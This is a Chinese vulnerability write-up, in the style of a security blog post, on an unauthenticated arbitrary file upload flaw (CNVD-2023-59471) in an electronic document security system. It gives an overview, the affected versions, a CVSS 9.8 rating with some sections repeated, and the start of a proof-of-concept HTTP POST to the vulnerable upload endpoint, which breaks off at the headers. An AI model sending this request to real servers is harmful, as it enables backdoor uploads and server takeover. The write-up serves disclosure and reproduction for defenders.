亿某通电子文档安全管理系统任意文件上传漏洞 CNVD-2023-59471
作者:mmseoamin日期:2023-12-19

1.漏洞概述

    亿某通电子文档安全管理系统是一款电子文档安全防护软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产。亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口处存在任意文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。

亿某通电子文档安全管理系统任意文件上传漏洞 CNVD-2023-59471,第1张

                               CNVD:https://www.cnvd.org.cn/flaw/show/CNVD-2023-59471(目前未公开)

2.影响版本

        <= V5.x

亿某通电子文档安全管理系统任意文件上传漏洞 CNVD-2023-59471,第2张


3.漏洞等级

        严重
        cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

        cvss-score: 9.8

2.影响版本

        <= V5.x

亿某通电子文档安全管理系统任意文件上传漏洞 CNVD-2023-59471,第2张


3.漏洞等级

        严重
        cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

        cvss-score: 9.8


4.漏洞复现

POC:

 
  1. POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1

  2. Host: { {hostname}}

  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0

  4. Connection: close

  5. Content-Length: 6

  6. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

  7. Accept-Encoding: gzip, deflate

  8. Accept-Language: zh-CN,zh;q=